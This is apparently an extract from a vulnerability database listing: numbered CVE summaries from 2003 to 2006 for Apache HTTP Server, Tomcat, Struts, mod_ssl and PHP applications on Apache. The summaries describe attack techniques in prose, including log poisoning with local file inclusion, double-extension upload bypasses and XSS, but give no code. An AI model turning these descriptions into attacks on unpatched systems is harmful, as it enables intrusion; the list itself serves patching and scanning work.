13680| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
13681| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
13682| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
13683| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13684| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
13685| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
13686| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
13687| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
13688| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
13689| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
13690| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
13691| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
13692| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
13693| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
13694| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
13695| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
13696| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
13697| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
13698| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
13699| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
13700| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
13701| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file that with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
13702| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
13703| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
13704| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
13705| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
13706| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
13707| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
13708| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
13709| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
13710| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
13711| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
13712| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
13713| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
13714| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
13715| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
13716| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
13717| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
13718| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
13719| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
13720| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
13721| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
13722| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
13723| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
13724| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
13725| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
13726| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
13727| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
13728| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
13729| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
13730| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
13731| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
13732| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
13733| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
13734| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
13735| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
13736| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
13737| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
13738| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
13739| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
13740| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
13741| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
13742| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
13743| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
13744| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
13745| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
13746| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
13747| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
13748| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
13749| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
13750| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
13751| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
13752| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
13753| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
13754| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
13755| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
13756| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
13757| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
13758| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
13759| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
13760| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
13761| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
13762| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
13763| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
13764| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
13765| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
13766| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
13767| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
13768| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
13769| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
13770| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
13771| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
13772| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
13773| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
13774| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
13775| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
13776| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
13777| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
13778| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
13779| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
13780| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
13781| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
13782| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
13783| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
13784| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
13785| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
13786| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
13787| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
13788| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
13789| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
13790| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
13791| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
13792| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
13793| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
13794| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
13795| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
13796| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
13797| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
13798| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
13799| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
13800| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
13801| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
13802| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
13803| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
13804| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
13805| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
13806| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
13807| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
13808| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
13809| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
